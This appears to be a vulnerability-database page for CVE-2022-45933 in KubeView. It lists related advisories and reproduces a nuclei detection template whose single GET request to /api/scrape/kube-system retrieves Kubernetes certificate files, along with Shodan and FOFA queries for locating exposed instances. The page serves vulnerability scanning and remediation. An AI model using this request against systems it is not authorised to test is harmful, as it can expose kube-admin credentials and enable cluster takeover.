Lucene search
K

KubeView <=0.1.31 - Information Disclosure

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

KubeView <=0.1.31 - Information Disclosure. Vulnerability allows unauthorized access to Kubernetes cluster and sensitive data exposure. Upgrade to version higher than 0.1.31

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-45933
17 Nov 202400:00
circl
CNNVD
KubeView 访问控制错误漏洞
27 Nov 202200:00
cnnvd
CVE
CVE-2022-45933
27 Nov 202200:00
cve
Cvelist
CVE-2022-45933
27 Nov 202200:00
cvelist
Github Security Blog
KubeView vulnerable to full cluster takeover due to improper authentication
27 Nov 202203:30
github
NVD
CVE-2022-45933
27 Nov 202203:15
nvd
OSV
GHSA-22VC-5PGW-644Q KubeView vulnerable to full cluster takeover due to improper authentication
27 Nov 202203:30
osv
Prion
Authentication flaw
27 Nov 202203:15
prion
Positive Technologies
PT-2022-27692 · Kubeview · Kubeview
27 Nov 202200:00
ptsecurity
RedhatCVE
CVE-2022-45933
22 May 202521:46
redhatcve
Rows per page
id: CVE-2022-45933

info:
  name: KubeView <=0.1.31 - Information Disclosure
  author: For3stCo1d
  severity: critical
  description: |
    KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Unauthenticated attackers can access Kubernetes certificate files through the unauthenticated api/scrape/kube-system endpoint, potentially obtaining kube-admin credentials and gaining complete control over the Kubernetes cluster.
  remediation: |
    Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933).
  reference:
    - https://github.com/benc-uk/kubeview/issues/95
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45933
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-45933
    cwe-id: CWE-306
    epss-score: 0.51696
    epss-percentile: 0.98811
    cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kubeview_project
    product: kubeview
    shodan-query:
      - http.title:"KubeView"
      - http.title:"kubeview"
      - http.favicon.hash:-379154636
    fofa-query:
      - icon_hash=-379154636
      - title="kubeview"
    google-query: intitle:"kubeview"
  tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/scrape/kube-system"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'BEGIN CERTIFICATE'
          - 'END CERTIFICATE'
          - 'kubernetes.io'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210086876785245c04049e64f81b4c6b4ad332f4efb4c279a2fa5d42881d56116add02204c253047ae98ac491d4d445de7a1d967753472a33c46dac754f79f0959a3a45f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.51696
SSVC
36